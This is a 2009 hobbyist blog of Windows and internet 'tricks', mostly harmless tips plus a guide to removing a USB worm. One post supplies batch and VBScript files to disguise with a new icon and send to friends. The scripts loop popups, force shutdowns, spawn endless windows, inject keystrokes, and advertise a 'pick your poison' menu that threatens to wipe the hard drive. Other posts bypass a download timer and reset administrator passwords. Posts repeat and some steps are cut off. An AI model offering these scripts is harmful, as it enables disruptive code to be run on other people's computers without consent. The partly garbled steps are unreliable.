This is a cool blog for interesting Pc tricks and tips, mobile tricks etc... This blog makes you gain much knowledge about computer and makes you GADGET GURU -Mithra
Thursday, July 30, 2009
Now itz easy to search a girl
*Pin Code
*Phone No.
*Speed Post Tracking
&
More
http://www.indiapost.gov.in
BE FAST N QUICK
hard-disk disk error &
keep fast ur hard-disk read
write speed.
try
open run
=>type cmd
=>type CHKDSK
Sunday, July 26, 2009
Edit any webpage INTERNET
2) In the browser’s address bar, paste this code:
javascript:document.body.contentEditable
='true'; document.designMode='on'; void 0
3) Now click on the part of the page you want to edit and start changing, deleting and adding text.
Friday, July 24, 2009
FUNNY NOTEPAD TRICK
2> Enter four words separated by spaces, wherein the first word has 4 letters, the next two have three letters, and the last word has five letters
3> DON'T hit enter at the end of the line.
4> Save the file.
5> Close Notepad.
6> Reopen Notepad.
7> Open the file you just saved.
eg:
type “Haro ooo ooo oooon” without quotation marks
don’t press “enter” save the file
close notepad
open the file again
See what happens!
Edit any webpage INTERNET
2) In the browser’s address bar, paste this code:
javascript:document.body.contentEditable
='true'; document.designMode='on'; void 0
3) Now click on the part of the page you want to edit and start changing, deleting and adding text.
RENAME MULTIPLE FILES
It is possible to rename multiple file at one TIME.
Just select all the files to be renamed
and then press F2 key.
Give the desired name and then press enter.
You are done, file name has been changed.
Thursday, July 23, 2009
NOTE PAD TRICKS
1>
Cycle a message in your friend's computer:
Type :
@ECHO off
:Begin
msg * Hi
msg * Are you having fun?
msg * I am!
msg * Lets have fun together!
msg * Because you have been o-w-n-e-d
GOTO BEGIN
Save it as "Anything.BAT" and send it.
2>
Convey your friend a lil' message and shut down his / her computer:
Type :
@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s
Save it as "Anything.BAT" in All Files and send it.
3>
Toggle your friend's Caps Lock button simultaneously:
Type :
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
Save it as "Anything.VBS" and send it.
4>
Continually pop out your friend's CD Drive. If he / she has more than one, it pops out all of them!
Type :
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Save it as "Anything.VBS" and send it.
5>
Frustrate your friend by making this VBScript hit Enter simultaneously:
Type :
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
Save it as "Anything.VBS" and send it.
6>
Open Notepad, slowly type "Hello, how are you? I am good thanks" and freak your friend out:
Type :
WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "
Save it as "Anything.VBS" and send it.
7>
Frustrate your friend by making this VBScript hit Backspace simultaneously:
Type :
MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
Save it as "Anything.VBS" and send it.
8>
Hack your friend's keyboard and make him type "You are a fool" simultaneously:
Type :
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop
Save it as "Anything.VBS" and send it.
9>
Open Notepad continually in your friend's computer:
Type :
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
Save it as "Anything.BAT" and send it.
10>
Hard prank: Pick your poison batch file. It asks your friend to choose a number between 1-5 and then does a certain action:
1: Shutdown
2: Restart
3: Wipes out your hard drive (BEWARE)
4: Net send
5: Messages then shutdown
Type :
@echo off
title The end of the world
cd C:\
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc...
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you're boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two
Save it as "Anything.BAT" and send it.
You might wanna have to change the Icon of the file before sending it to your friend, so right click the file, click Properties, click on the 'Change' Icon and change the icon from there.
Sunday, July 19, 2009
download ZOO ZOO funny videos
Be free to download funny adds of ZOO ZOO(vodafone) from following links:
ZOO pics:- http://www.ziddu.com/download/5670151/ZooZooPics.rar.html
there is a problem while adding videos i will tomm
Saturday, July 18, 2009
Want to know something interesting??U can change ur XP key now...
Here's How:
Click on Start and then Run.
In the text box in the Run window, type regedit and click OK. This will open the Registry Editor program.
Locate the HKEY_LOCAL_MACHINE folder under My Computer and click on the (+) sign next the folder name to expand the folder.
Continue to expand folders until you reach the HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\Current Version\WPAEvents registry key.
Click on the WPAEvents folder.
In the results that appear in the window on the right, locate OOBETimer.
Right-click on the OOBETimer entry and choose Modify from the resulting menu.
Change at least one digit in the Value data text box and click OK. This will deactivate Windows XP.
Click on Start and then Run.
In the text box in the Run window, type the following command and click OK.
%systemroot%\system32\oobe\msoobe.exe /a
When the Windows Product Activation window appears, choose Yes, I want to telephone a customer service representative to activate Windows and then click Next.
Click Change Product Key.
Type your new, valid Windows XP product key in the New key text boxes and then click Update.
If you're taken back to the previous screen and prompted, choose Remind me later.
Restart your PC.
Thursday, July 16, 2009
How to disable password request before logon
Open the run dialog (start > run).
Type "Control Userpasswords2" without quotes and click ok.
In the resulting User Accounts dialog box, uncheck the "Users must enter a user name and password to use this computer" check box.
Click the apply button.
Tuesday, July 14, 2009
Jntu anthem
Do you know u JNTU kakinada have an anthem???????? here is a link to download it
http://www.ziddu.com/download/5596997/jntuanthem.mp3.html
plz write comments on my articles
Another Trick To Download Fast From Rapid Share
Previously I have posted a trick to download fast from rapid share..... here are some more tricks...... In arapid share if u r downloading for the first time u need not wait for a long time, but if u want 2 download another file immediately generally it asks u to wait for 15 mins .
Trick 1) Immediately after downloading after one file just disconnect u r modem(switch off) and connect it again....... That all u can download u r file with out waiting for much time
Trick 2) U can use the software called US DOWNLOADER, here i am giving the link to download it
http://www.ziddu.com/download/5596963/USDownloader.exe.html
Note:- Note that Trick 1 is only if u r using BSNL BROADBAND, becoz it has dynamic IP
Monday, July 13, 2009
Advanced communication Skills lab
here is a group discussion vedio.......... u can download it from following website
http://www.ziddu.com/download/5592191/ACompleteViewOfGroupDiscussion-Video.flv.html
Friday, July 10, 2009
FAQ in Interviews
Here are some Faqs in most of some interviews..........just have glance about those
http://rapidshare.com/files/254185895/FAQ_in_interview_Interview.doc.html
Funny video
The most funniest video but watch it seriously n alone
http://www.ziddu.com/download/5544245/VeryFunnyVideothemazemissingdog.flv.html
Thursday, July 9, 2009
TO GET IMAGES FROM PDF
FILES..........
Some PDF image extract is a simple tool that extract image in the
pdf file to TIFF, JPEG, BMP, GIF, PNG, TGA, PBM, PPM format.
Download Some PDF image extract and install it .Then select pdf
file and press 'F5' starting to convert.After finished ,all the
converted image will store in a folder.
Wednesday, July 8, 2009
Obama's Victory Speech Easy Download
A historical obama's victory speech on 4th nov,chicago and martin luther king Jr. speech can be easyly downloaded from following link in zip format
http://www.ziddu.com/download/5517046/obamaspeech.rar.html
http://www.ziddu.com/download/5517090/Martinlutherkingspeech..rar.html
Sunday, July 5, 2009
Trick for preventing autoplay
this prevents the autoplay option.
@so now if u do it next time
& enjoy
Fix Corupted File in WindwXP
go to run
type cmd
now
Type Sfc/scan.
ok den Copy Lost File frm cd
TRICK FOR HOW TO USE VIRTUAL MEMORY WITH PENDRIVE IN WINDOWS XP/VISTA
> Insert Pen Drive (1GB atleast) in the USB port
(try to USE 4GB.)
> Let the PC detect it..
> After it finished his work, you HAVE TO DO THESE THINGS
Right Click on My Computer -> Properties
Advanced -> Performance Settings
Advanced -> Change
Select the Pen Drive
Click on Custom Size
” Check the value of space available ”
Enter the same in the Initial and the Max columns
” You just used the space of the PenDrive as a Virtual Memory ”
Saturday, July 4, 2009
DID U SEE GHOST??????
Friday, July 3, 2009
DOWNLOAD FAST FROM RAPIDSHARE
time delay for FREE downloaders!!!
HERE IS A SOLUTION TO THAT PROBLEM
>>> Click a Download link for Rapidshare !
>>> Click the Free button on Rapidshare Page !
>>> Now as usual the timer starts !!!
>>> Now, go to the address box of your browser.
(Where you type the websites !)
>> In the address box type: javascript:alert(c=0)
>> Click OK on the alert box that arises
UR PROBLEM IS SOLVED........
what ever u type ur computer will speak with out any software
TEXT to VOICE without any
software.
steps are
>go to run
>type
Control speech
>write any text
it will be converted to voice
RESET ADMINISTRATOR PASSWORD
1. First reboot Windows XP in safe mode by re-starting the
computer and pressing F8 repeatedly as the computer boots up. If
you missed the right moment, you will need to repeat the attempt.
2. Then (in safe mode) click Start and then click Run. In the open
box type the words exactly as following (without quotes) - control
userpasswords2.
3. You will now get a pop-up window with full access to all the
user accounts, including the administrators account. From here,
you will be able to reset the lost or forgotten password.
4. Just click the administrators’ user account, and then click
Reset Password.
5. At this moment, you will have to add a new password in the New
password field, and the Confirm new password as well. Confirm the
new chosen password by clicking OK.
BEST TOP 10 TIPS TO INCREASE SPEED OF UR PC
time then minimize those you are not using. This helps reduce the
overload on RAM.
2>>Drivers: Update your hardware drivers as frequently as
possible. New drivers tend to increase system speed especially in
the case of graphics cards, their drivers are updated by the
manufacturer very frequently!
3>>Start Up Programs: Windows can be slowed down when programs run
on start up. To eliminate this, check your Start up folder. You
can access it from the start menu: Start, Programs, Start Up.
Another way to eliminate programs from loading even before Windows
actually starts is by doing the following: Click on Start, then
Run. Type msconfig. It will take quite a long time for this
program to load, but when you finally see it on your screen,
explore the different tabs. They all have to do with how quickly
your PC boots, so select what you want, and uncheck what you don't
want!
4>>Refresh the Taskbar without restarting: If you in some way
change the taskbar, either in Regedit or elsewhere, you can
refresh the task bar without restarting. Hold down Ctrl Alt Del,
and double click on Explorer. Say Yes to close Explorer, but no to
closing Windows. This will refresh the Taskbar and system tray.
5>> Faster Start-Menu Access: Go to the Start menu and select Run.
Now type Regedit and hit Enter. The Registry Editor will appear on
the screen. Now, open the folder HKEY_CURRENT_USER\Control
Panel\Desktop. You should see a MenuShowDelay value. If you don't
then do the following: right click on a blank space in the right
pane and select New\String. Change the name in the new value to
MenuShowDelay. Now that we have the MenuShowDelay value, double
click on it and enter 0 in the value data field. This sets the
start menu delay to 0 milliseconds.
6>>Restart only Windows: When restarting your PC, hold down Shift
to only restart Windows rather than the whole system which will
only take a fraction of the time.
7>>Defragment Often: defragment your drive, data is physically
arranged on the drive so that applications will load faster.
8>> Wallpapers: They slow your whole system down, so if you're
willing to compromise, have a basic plain one instead!
9>>Fonts: When Windows starts, it loads every single font in the
Fonts folder. Therefore, the more fonts you have, the slower the
booting process. To get rid of unwanted fonts, simply go to the
Fonts folder under c:\windows and remove whatever you don't want.
Fonts that have a red letter 'A' as their icon are system fonts,
so don't delete them.
10>> Quick CD Eject: Instead of pushing the button on your drive,
right-click your CD drive letter in My Computer and click on
Eject. This will also remove any icons that have become associated
with the CD drive.
HOW TO REMOVE Drivegaurd.exe or flashgaurd.exe VIRUS
“this worm will remove all files from C:\heap41a that are related
to other malicious programs it enables TaskManager if is disabled”
- BitDefender
it also download some other malicious files to your computer
You can locate the virus files at c:\Program
Files\FlashGuard\FlashGuard.exe
Or you may have to change the attributes of this folder.For that
you can refer this guide
c:\Program Files\FlashGuard\FlashGuard.exe
c:\Program Files\FlashGuard\ReadMe.txt
c:\DocumentsandSettings\**UserProfile\LocalSettings\Temp\DriveGuar
d.tmp.exe
c:\DocumentsandSettings\**UserProfile\LocalSettings\Temp\gHmpg.tmp
.exe
It creates folders in your pendrive & copy itself to :
f:\System\Security\DriveGuard.exe *
f:\autorun.inf *
f: is your pen drive so change it according to your pendrive
drive.
Will add itself to startup:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\F
lashGuard
To see these virus you must set Windows to show hidden files -
HOW TO REMOVE IT :
Press Ctrl+Alt+Del to open ‘Task Manager’, select FlashGuard.exe &
click ‘End Process’
You can browse to the folder mentioned above or you can find it
quickly by using ‘Search’ feature(Start Menu>>Search). In the
search box type, flashguard.exe or flashguard. Don’t hit the
search button ..
Scroll down & expand ‘More Advanced Options’.Check the all the box
as you see in the screenshot below & hit ‘Search’ button..
Delete all the files found..
Also serch for .tmp.exe, delete DriveGuard.tmp.exe & gHmpg.tmp.exe
files…
The virus files can easily be recognized with pendrive icon and
delete those files.
Congrats, the virus is removed from your computer. But still some
entries made by the virus files exists in registry.
Go to start->run and type msconfig and hit enter
Select ‘Startup’ tab, select & uncheck FlashGuard. Click ‘Apply’.
Delete Registry Entry : Go to Start Menu>>Run, type regedit &
click ‘Ok’
Browse to :
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\F
lashGuard
Select FlashGuard, right-click on it & delete
HOW TO REMOVE Drivegaurd.exe or flashgaurd.exe VIRUS
“this worm will remove all files from C:\heap41a that are related
to other malicious programs it enables TaskManager if is disabled”
- BitDefender
it also download some other malicious files to your computer
You can locate the virus files at c:\Program
Files\FlashGuard\FlashGuard.exe
Or you may have to change the attributes of this folder.For that
you can refer this guide
c:\Program Files\FlashGuard\FlashGuard.exe
c:\Program Files\FlashGuard\ReadMe.txt
c:\DocumentsandSettings\**UserProfile\LocalSettings\Temp\DriveGuar
d.tmp.exe
c:\DocumentsandSettings\**UserProfile\LocalSettings\Temp\gHmpg.tmp
.exe
It creates folders in your pendrive & copy itself to :
f:\System\Security\DriveGuard.exe *
f:\autorun.inf *
f: is your pen drive so change it according to your pendrive
drive.
Will add itself to startup:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\F
lashGuard
To see these virus you must set Windows to show hidden files -
HOW TO REMOVE IT :
Press Ctrl+Alt+Del to open ‘Task Manager’, select FlashGuard.exe &
click ‘End Process’
You can browse to the folder mentioned above or you can find it
quickly by using ‘Search’ feature(Start Menu>>Search). In the
search box type, flashguard.exe or flashguard. Don’t hit the
search button ..
Scroll down & expand ‘More Advanced Options’.Check the all the box
as you see in the screenshot below & hit ‘Search’ button..
Delete all the files found..
Also serch for .tmp.exe, delete DriveGuard.tmp.exe & gHmpg.tmp.exe
files…
The virus files can easily be recognized with pendrive icon and
delete those files.
Congrats, the virus is removed from your computer. But still some
entries made by the virus files exists in registry.
Go to start->run and type msconfig and hit enter
Select ‘Startup’ tab, select & uncheck FlashGuard. Click ‘Apply’.
Delete Registry Entry : Go to Start Menu>>Run, type regedit &
click ‘Ok’
Browse to :
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\F
lashGuard
Select FlashGuard, right-click on it & delete
hide partitions of hard disk
simple steps.
1. Goto Start > Run and type diskpart
A DOS window will appear with following description
DISKPART>
2. Then type list volume
All partitions will be listed, there will be also a volume number
for each partitions
3. Suppose you want to hide drive E:, type select volume 3 (Here 3
is the volume number of E:, in your pc it may vary). A message
will now appear in the window saing "Volume 3 is the selected
volume".
4. Now type remove letter E . You may have to reboot the computer.
Diskpart will remove the letter. Since Windows XP doesn't have the
capability to identify the unknown volume, it won't display or
show results from it. To access the content of the hidden drive,
repeat the process, but in the foruth step, replace remove to
assign, ie., assign letter E
REMOVE ARROW FROM SHORTCUTS IN WINDOWS VISTA
shortcuts in windows vista.
the steps are
1. Type “regedit.exe” in the search box without double quotes.
2. Browse to key HKEY_CLASSES_ROOT
3. Open the Key LNKFILE
4. Rename the value assigned with this key “IsShortcut” something
other than.
5. Log out and back in again.
6. You will notice the change.
Revert the procedure to get the arrow again on the shortcuts
Navigate to:User Configuration / Administrative Templates / System
/ Ctrl+Alt+Delete Options / Remove Task Manager .Double click the
Remove Task Manager option.Change the policy to Not Configured and
click ok
Problem with virus...... Task manager enabler
the task manager and disable it
This is because if we know that there is a virus active in our
background there’ll be a chance to stop it using task manager.
Disable task manager doing by viruses editing the computer
registry.
Here how you can fix and get back the Task manager again.
"Method 1":Click Start >> Run >> and type the code below and press
Enter.
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Pol
icies\System /v DisableTaskMgr /t REG
"Method 2":Click Start>> Run>> and type Regedit.exe (open registry
editor)
Navigate to the HKEY_CURRENT_USER \ Software \ Microsoft \ Windows
\ CurrentVersion \ Policies\ System .In the right-pane, delete the
value named DisableTaskMgrClose Registry editor. You may want to
restart you computer for changes take effect.
"Method 3":Click Start >> Run >> type gpedit.msc (Open Group
policy editor)